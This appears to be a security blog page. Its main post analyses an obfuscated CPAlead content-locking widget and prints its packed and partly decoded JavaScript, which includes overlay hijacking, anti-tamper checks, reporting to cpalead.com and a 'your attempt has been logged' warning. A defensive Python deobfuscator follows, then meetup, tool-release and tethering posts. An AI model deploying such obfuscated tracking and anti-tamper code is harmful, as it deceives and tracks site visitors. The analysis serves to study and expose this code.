51=96();4((51[1]-2.5(\'11\').3.23.218("130",""))>30){2.5(\'11\').3.23=(51[1]+\'130\')}4(149==0){48("141();",169)}}9 77(7,178){4(178!=175){34.213.291=\'37://71.43.46/290.72?82=83\'}6 15=2.5(\'11\');6 26=2.5(\'35\');140(1);150(1);177(1);149=1;102=75;4(76(7,\'66\')==1&&191!=75){15.3.120="118(18=0)";15.3.18="0.0";2.5(\'24\').44=\'37://71.292.293/294-109.72\';191=75}12{26.3.21=\'42\';15.3.21=\'42\';2.5(\'24\').44=\'289:288\';2.5(\'24\').3.21=\'42\'}153 85}9 57(174){4(!102&&131){4(19.188&&19.188.185){6 147=1}12{6 147=0}67=146 173();67.44="37://71.43.46/62-145.72?82=83&185="+147+"&145="+174;2.20.161(67);164()}}9 151(148){4(!102&&131){67=146 173();67.44="37://71.43.46/62-145-283.72?82=83&148="+148;2.20.161(67);194(\'37://71.43.46/282.72?82=83\')}}9 156(){4(!2.5(\'11\')){57(\'109-110-132\')}12 4(!2.5(\'35\')){57(\'62-110-132\')}12 4(!2.5(\'24\')){57(\'64-110-132\')}12 4(2.5(\'11\').3.17!="100%"||2.5(\'11\').3.21!="55"||2.5(\'11\').3.33!="47"){57(\'109-163\')}12 4(2.5(\'35\').3.17!="100%"||2.5(\'35\').3.21!="55"||2.5(\'35\').3.33!="47"){57(\'62-163\')}12 4(2.5(\'24\').3.21!="55"){57(\'64-110-47\')}4(2.5(\'24\').60<=300&&2.5(\'24\').60!=0){151(\'64-23-158-\'+2.5(\'24\').60)}12 4(2.5(\'11\').60<=100&&2.5(\'11\').89<=100){151(\'109-23-158-\'+2.5(\'11\').60+\'-\'+2.5(\'11\').89)}48("156()",172)}9 164(){6 143=["\\168\\165\\136\\84\\134\\284","\\136\\84\\167\\134\\187\\204\\84\\216"];19[143[1]][143[0]]()}9 194(217){6 154=["\\296\\168\\165\\287","\\136\\84\\167\\134\\187\\204\\84\\216"];34[154[1]][154[0]]=217}9 219(7){2.5(\'24\').286.213.218(\'37://71.43.46/295.72?82=83&302=203.45.56.190&7=\'+7+\'&299=\'+166(2.298)+\'\')}9 214(7){6 51=96();6 88=2.81("20").207(0);6 15=2.253("10");15.73(\'13\',\'11\');15.3.21=\'42\';15.3.28=\'121\';15.3.34=\'0\';15.3.202=\'0\';15.3.197=\'301\';15.3.17=\'100%\';88.201(15,88.303);142=76(7,\'18\');92=142/100;2.5(\'11\').3.120="118(18="+142+")";2.5(\'11\').3.18=92;15.3.23=(51[1]+\'130\');15.3.21=\'55\';15.3.33=\'47\'}9 199(7){6 
106=[\'200%297\'];4(!2.5(\'11\')){214(7)}12{4(2.5(\'11\').3.21=\'42\'){2.5(\'11\').3.21=\'55\';92=76(7,\'18\')/100;2.5(\'11\').3.120="118(18="+92+")";2.5(\'11\').3.18=92}}6 51=96();141();140(0);150(0);6 26=2.5(\'35\');26.3.21=\'55\';26.3.33=\'47\';26.3.28=\'121\';26.3.34=\'0\';26.3.202=\'0\';26.3.197=\'285\';26.3.17=\'100%\';6 144=0;90(6 8=0;8<106.97;8++){4(106[8]==7||106[8]==166(7)){6 157=76(7,\'66\');4(157==1){2.5(\'129\').53=\'<10 3="28: 54; 17: 152; 34: 193; 63: -186; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 3="112: 105;"><91 44="37://94.43.46/103/160-62/160-280-262-261.179" 93="0" 101="111 117"></14></10>\';2.5(\'116\').53=\'<10 3="28: 54; 17: 152; 34: 193; 63: -186; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 13="221" 3="112: 105;"><91 17="135" 23="40" 44="37://94.43.46/103/192.182" 93="0" 101="111 117"></14></10>\'}12{2.5(\'129\').53=\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 3="112: 105;"><91 44="37://94.43.46/103/281/264.179" 93="0" 101="111 117"></14></10>\';2.5(\'116\').53=\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 13="221" 3="112: 105;"><91 17="135" 23="40" 44="37://94.43.46/103/192.182" 93="0" 101="111 117"></14></10>\'}6 144=1;132=8;260}}4(144==0){2.5(\'129\').53=\'\';2.5(\'116\').53=\'\'}26.3.23=(51[1]+\'130\');48("219(\'"+7+"\');",169);2.5(\'24\').3.21=\'55\';131=75;48("156();",255)}9 171(){119=119-1;2.5("256").53=119;4(119<=0){257()}12{48("171()",172)}}2.16(\'<3 258="36/266">#11{27-32: #155; 120:118(18=80); 18: 0.80; -267-18: 0.80;}\');2.16(\'#35 14 {27:42;52-210:138;32:#206;36-208:42}\');2.16(\'#35 91 {93: 162;}\');2.16(\'#35 14:276 {27:42;52-210:138;32:#206;36-208:275}</3>\');2.16(\'<10 13="35" 3="21:42; 36-39: 38; 277-23: 138; ">\');2.16(\'<10 13="129" 39="38" 3="28: 121; 17: 
100%; 31-29: 115;">\');2.16(\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;">\');2.16(\'</10>\');2.16(\'</10>\');2.16(\'<10 13="116" 39="38" 3="28: 121; 17: 100%; 31-29: 125;">\');2.16(\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;">\');2.16(\'</10>\');2.16(\'</10>\');2.16(\'<10 3="278: 152 279 162; 27: 25; 23: 274; 31-29: 273;">\');2.16(\'<64 17="100%" 23="269" 13="24" 44="" 268="75" 270="0" 3="28: 54; 23: 272; 205-65: 86; 205-271: 86; 27-32: 25; 31-29: 254; " 259="265"></64>\');2.16(\'</10></10>\');',10,304,'||document|style|if|getElementById|var|gateid|i|function|div|aijvqsnovujrsfoj3|else|id|a|dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5|write|width|opacity|window|body|display|em|height|wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831|transparent|zcpkmswwmxlgjzbue41a138882143252732d893|background|position|index||z|color|visibility|top|wzjyzgbhqzohhlhvef8426b5a89be2|text|http|center|align||onoroff|none|cpalead|src||com|visible|setTimeout|object_tags||arrayPageSize|font|innerHTML|relative|block||guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9|b|bodyloadtime|offsetHeight|d|widget|right|iframe|x|donation_widget|dpjfszjhzduviwkn424c2477e2d48|c|12px|size|www|php|setAttribute|documentElement|true|getWidgetSetting|mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a|iframe_tags|ytndhhmwdjexjqej106a67d2||getElementsByTagName|pub|42138|x6F|false|hidden|wmode|gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62|clientHeight|for|img|opacity_setting_moz|border|static||getPageSize|length|clientWidth|||alt|cbtonfugwctexmjdff8bd9e3648ab7|images|innerHeight|pointer|closebuttons|onclick|popup_delay|overlay|not|Close|cursor|func|checkForBody|11863866|arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c|Widget|alpha|countdown|filter|absolute|135px|settings|widgetJSON|11863936|172px|452px|onload|lpepmphihufelzdd28c18f8093587772fdd38f|px|ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6|found|oldonload|x61||x6C|self|normal|pn|jrbxaafwxpcz
sjiy0a8801c687f76b5f6d210b99a0250a37|dontscroll|opacity_setting_ie|_0x96be|has_closebtn|tamper|new|hasfirebug|reason|mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e|mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22|ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69|72px|return|_0xb500|000|hienslexztaecvon972b4c6959457b72d8591114abeb305d|is_donation|invalid|video_bucket|rice|appendChild|0px|styles|sgfplcetedjsqmbvbbcb115|x65|escape|x63|x72|500|video_controller|secondpass|1000|Image|tampertype|xwwjxyvbmsrjfpud17e9cae225420|innerWidth|yecqogvnndwlktmu|adixdgozwczhuvaf6e84b|png|pageWidth|pageHeight|gif|scrollHeight|scrollMaxY|firebug|225px|x74|console|settingname||secondclose|blank7|158px|lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73|navigator|nx|zIndex|appName|myGatewayStart|NzMxNTM|insertBefore|left||x69|overflow|fff|item|decoration|ems|weight|embeds|Microsoft|location|createOverlay|Explorer|x6E|url|replace|loadGatewayIframe|Internet|closebtn|ODA1OTE|scrollMaxX|OTM5ODQ|NzM5NTQ|startGateway|this|disable|offsetWidth|to|unescape|scrollWidth|removeChild|catch|e|embed|null|object|has|been|try|Your|logged|parentNode|countdownStarted|attempt|typeof|isloaded|gmgqvtjawhodlboj8b0d5f2c|bodyexisted|addWidgetLoadEvent|nextSibling|createElement|11863886|5000|closelink|riunpfcaxfcggjhpf|type|scrollbars|break|button|close|Array|close_btn|NO|css|moz|allowtransparency|640|frameborder|y|640px|11863881|482px|underline|hover|line|margin|auto|skin|help|nostyle|test|x64|11863846|contentWindow|x66|blank|about|adblock|href|surveysforcharity|org|thankyou|mygateway_iframe_loader|x68|3D|referrer|ref||11863836|subid|firstChild'.split('|'),0,{}))
Which gives us a further layer of obfuscated JavaScript: the same content-locking widget with hashed identifiers, tamper checks that phone home to cpalead.com, and hex-escaped property names (the _0x96be and _0xb500 arrays spell out location.reload and top.location.href):
var widgetJSON={"settings":[{"id":"OTM5ODQ=","opacity":"99","donation_widget":"0"},{"id":"NzMxNTM=","opacity":"50","donation_widget":"0"},{"id":"NzM5NTQ=","opacity":"30","donation_widget":"0"},{"id":"ODA1OTE=","opacity":"95","donation_widget":"0"}]};function getWidgetSetting(gateid,settingname){for(var x=0;x<widgetJSON.settings.length;x++){if(widgetJSON.settings[x].id==unescape(gateid)){return widgetJSON.settings[x][settingname]}}}var popup_delay='';var countdownStarted=false;var isloaded=true;var ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=false;var cbtonfugwctexmjdff8bd9e3648ab7=false;var bodyexisted=false;var bodyloadtime=0;var mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=0;var xwwjxyvbmsrjfpud17e9cae225420='ytndhhmwdjexjqej106a67d2';var gmgqvtjawhodlboj8b0d5f2c='Your attempt to disable this widget has been logged.';function addWidgetLoadEvent(func){var oldonload=window.onload;if(typeof window.onload!='function'){window.onload=func}else{window.onload=function(){if(oldonload){try{oldonload()}catch(e){}}if(func){func()}}}}function checkForBody(gateid){var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName("body").item(0);if(gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62==null){bodyloadtime=bodyloadtime+300;setTimeout("checkForBody('"+gateid+"');",300)}else{myGatewayStart(gateid)}}function startGateway(gateid){if(popup_delay>0){bodyloadtime=bodyloadtime+popup_delay+'000';setTimeout("checkForBody('"+gateid+"');",popup_delay+'000')}else{bodyloadtime=bodyloadtime+300;setTimeout("checkForBody('"+gateid+"');",300)}}function yecqogvnndwlktmu(onoroff){iframe_tags=document.getElementsByTagName('iframe');for(i=0;i!=iframe_tags.length;i++){if(iframe_tags[i].id!='wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831'){if(onoroff==0){iframe_tags[i].style.visibility='hidden'}if(onoroff==1){iframe_tags[i].style.visibility='visible'}}}}function jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(onoroff){var 
embeds=document.getElementsByTagName('embed');for(var ems=document.embeds,i=0,em;em=ems[i];i++){if(em.id!='video_controller'&&em.id!='video_bucket'){if(onoroff==0){if(navigator.appName=='Microsoft Internet Explorer'){em.setAttribute('wmode','transparent');em.style.visibility='hidden'}else{em.setAttribute('wmode','transparent');var nx=em.nextSibling,pn=em.parentNode;pn.removeChild(em);pn.insertBefore(em,nx)}}if(onoroff==1){em.setAttribute('wmode','window');if(navigator.appName=='Microsoft Internet Explorer'){em.style.visibility='visible'}}}}}function mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(onoroff){object_tags=document.getElementsByTagName('object');for(i=0;i!=object_tags.length;i++){if(object_tags[i].id!='video_controller'&&object_tags[i].id!='video_bucket'){if(onoroff==0){object_tags[i].setAttribute('wmode','transparent');object_tags[i].style.visibility='hidden'}if(onoroff==1){object_tags[i].style.visibility='visible';object_tags[i].setAttribute('wmode','window')}}}}function getPageSize(){var c,d;if(window.innerHeight&&window.scrollMaxY){c=window.innerWidth+window.scrollMaxX;d=window.innerHeight+window.scrollMaxY}else if(document.body.scrollHeight>document.body.offsetHeight){c=document.body.scrollWidth;d=document.body.scrollHeight}else{c=document.body.offsetWidth;d=document.body.offsetHeight}var a,b;if(self.innerHeight){a=document.documentElement.clientWidth?document.documentElement.clientWidth:self.innerWidth;b=self.innerHeight}else if(document.documentElement&&document.documentElement.clientHeight){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else if(document.body){a=document.body.clientWidth;b=document.body.clientHeight}pageHeight=d<b?b:d;pageWidth=c<a?c:a;return arrayPageSize=new Array(pageWidth,pageHeight,a,b)}function dontscroll(){var 
The next steps would be far too time-consuming for me given the glaringly obvious conclusion you can draw by googling for cpalead or http://www.cpalead.com/mygateway_iframe_loader.php. In conclusion, there isn't anything new here. The techniques aren't very advanced, but good enough to keep the general public ignorant of what's really going on. I did find the firebug / anti-tamper code used in the last bit of JS interesting, but I'm sure that malware analysts have seen it thousands of times before.
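The anti-tamper part of the cpalead script hid its sinks behind hex-escaped string tables, e.g. var _0x96be=["\x72\x65\x6C\x6F\x61\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"]; window[_0x96be[1]][_0x96be[0]]() which is just window.location.reload(). The following Python is an added example, not code from the original post or from the script analysed: it decodes such tables and rewrites the indexed lookups so the calls read in plain text, and lists the decoded strings that are navigation sinks. The snippet it runs on is constructed to mirror the pattern seen above, and the regexes assume the _0x... naming used by that obfuscator.

```python
import re
from typing import Dict, List

# Constructed sample mirroring the string-table obfuscation in the analysed script.
SAMPLE_JS = r'''
function reloadPage(){var _0x96be=["\x72\x65\x6C\x6F\x61\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];window[_0x96be[1]][_0x96be[0]]()}
function redirect(url){var _0xb500=["\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];top[_0xb500[1]][_0xb500[0]]=url}
'''

# \xNN and \uNNNN escapes inside a JS string literal.
ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})')
# var _0xNNNN = [ ... ]   (the obfuscator's string table)
TABLE_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[([^\]]*)\]')
# One string literal, double- or single-quoted, escapes preserved.
STRING_LIT_RE = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')
# obj[_0xNNNN[i]]  ->  an indexed lookup into a string table
ACCESS_RE = re.compile(r'\[(_0x[0-9a-fA-F]+)\[(\d+)\]\]')

# Property names that make a script navigate or rewrite the page.
NAVIGATION_SINKS = {"location", "href", "reload", "replace", "assign", "eval", "write"}


def decode_js_string(literal: str) -> str:
    """Resolve \\xNN / \\uNNNN escapes to the characters they encode."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), literal)


def extract_string_tables(js: str) -> Dict[str, List[str]]:
    """Map each _0x... table name to its decoded string entries."""
    tables: Dict[str, List[str]] = {}
    for name, body in TABLE_RE.findall(js):
        tables[name] = [decode_js_string(dq or sq) for dq, sq in STRING_LIT_RE.findall(body)]
    return tables


def deobfuscate(js: str) -> str:
    """Rewrite obj[_0x..[i]] lookups as obj.<decoded name> so sinks read plainly."""
    tables = extract_string_tables(js)

    def resolve(m: "re.Match[str]") -> str:
        name, idx = m.group(1), int(m.group(2))
        if name in tables and idx < len(tables[name]):
            return "." + tables[name][idx]
        return m.group(0)  # unknown table: leave untouched rather than guess

    return ACCESS_RE.sub(resolve, js)


def flag_sinks(js: str) -> List[str]:
    """Decoded table entries that are navigation/eval sinks, for triage."""
    tables = extract_string_tables(js)
    return sorted({s for entries in tables.values() for s in entries if s in NAVIGATION_SINKS})


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_JS))
    print("sinks:", flag_sinks(SAMPLE_JS))
```

On the sample this yields window.location.reload() and top.location.href=url, which is the reload-on-tamper and redirect behaviour the post describes.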
I am presenting at this month's Ruxcon Monthly Meetup.

Date: Friday, 25th June
Time: 6:00PM
Location: RMIT University, City Campus
https://my.rmit.edu.au/portal/page/portal/RMITPortal/campusmaps?dsize=max
Room: Building 8, Level 9, Room 42 (008.09.042)

RMIT Building 8 entrance is off Swanston Street (just past Swanston and
La Trobe). Please take the lift to Level 9 and make your way to Room 42.
We will have directions posted up in the building.

Presentations
=============

Unsanitary Web Activities - Tim Noise (MovingData)

In the land of the internet, web developers are constantly rolling out
new applications and letting them free into the Internet. Many with
little knowledge or experience in security. They assume the users will
provide data in a manner they expect. This talk will cover webapp
security basics and commonplace attacks, showing you the effect this
oversight can have, and how to prevent it.

Pownage Coquillage: Real World Tales From The Trenches - Sash Biskup
(Stratsec)

In this talk the presenter will discuss various security incidents he
has been involved in during the course of his career. Starting with old
school bof through to modern day malware and blackmail. This isn't a
deep technical analysis of each incident but an overview of the
characteristics of each of the attacks and what the repercussions were to
the organisation or individual.

Static analysis with Graudit - Eldar Marcussen

Graudit is a rough audit tool that can be used to find vulnerabilities
in source code (C, ASP, .NET, JSP, PHP, Perl and Python). In this
presentation I will show how to get the most out of graudit.

After a short hiatus I am happy to deliver the next graudit release. Version 1.6 introduces three new databases: c, dotnet and "all". The all database is a combined database of all the distributed signatures, so you can more easily scan multi-language projects. The rough database has also been deprecated. As usual there are some new features, bug fixes and signature tweaks; see the changelog for the full details.

You can download the latest version from the graudit download page.
Please note that with the current changes to the test suite there is no development (.src.tar.gz) release. If you are a package maintainer or otherwise wish to use the development release you can either clone the git repository or wait for the upcoming 1.7 release.
Since my iPhone is a company phone, jailbreaking was never an option. I'm surprised to see the number of terrible "tether your iPhone by jailbreaking it" guides out there. I suppose at some stage there was no decent driver in sight. Anyway, this is how you tether the iPhone by installing third-party compiled binaries.

First we add the third-party repository and update the apt cache (this has security implications, so don't cry if your wallpaper suddenly changes to tubgirl):
    sudo add-apt-repository ppa:pmcenery/ppa
    sudo apt-get update
Then we install the required modules (accept the dependencies):
    sudo apt-get install gvfs ipheth-utils
This will install and insmod the ipheth driver. Make sure that internet sharing is enabled on your iPhone and plug it in. It should show up as a wired connection. If something went wrong, check your dmesg. I have experienced timeouts on TX which caused it not to initialize. Replugging did the trick.
In the spirit of openness the Apache foundation has released an excellent post-mortem write-up of their recent compromise. It started with an XSS attack leveraged through the issue tracking software they use (JIRA) and ended with complete root access on one server, limited access to another and a number of passwords compromised.

Read the entire story at https://blogs.apache.org/infra/entry/apache_org_04_09_2010

From Chris Spencer on the ruxcon mailing list:

As part of a new initiative, the Ruxcon Team, in conjunction with the RMIT Information Security Collective, has established a monthly meeting in Melbourne. The aim of the meeting is to encourage individuals to perform a short presentation on computer security or a related topic in front of a small audience. The monthly meetings are open to everyone and free to attend.

The presentations are intended to be short (between 5 and 20 minutes); a projector and screen will be provided. We encourage participation from everyone and hope to see a variety of presentations over the coming months. Any topic is welcome; a presentation could be as simple as speaking for 5 minutes about a project you are currently working on, or day-to-day work tasks within your given field.

If you are interested in participating please email us at ruxcon ruxcon org au.

Please join us on Friday and help make the kickoff a success!

Details for the kickoff:

Date: Friday, 23rd April
Time: 6:00pm
Location: RMIT University, City Campus
https://my.rmit.edu.au/portal/page/portal/RMITPortal/campusmaps?dsize=max
Room 008.09.041 (Building 8, Level 9, Room 41)

Presentations:

  • SQL Injections 101 - Louis Nyffenegger (@snyff)
  • Malware Analysis for Incident Response - Ash Fox
  • Binary Analysis Basics - Chris Spencer
This weblog is licensed under a Creative Commons License.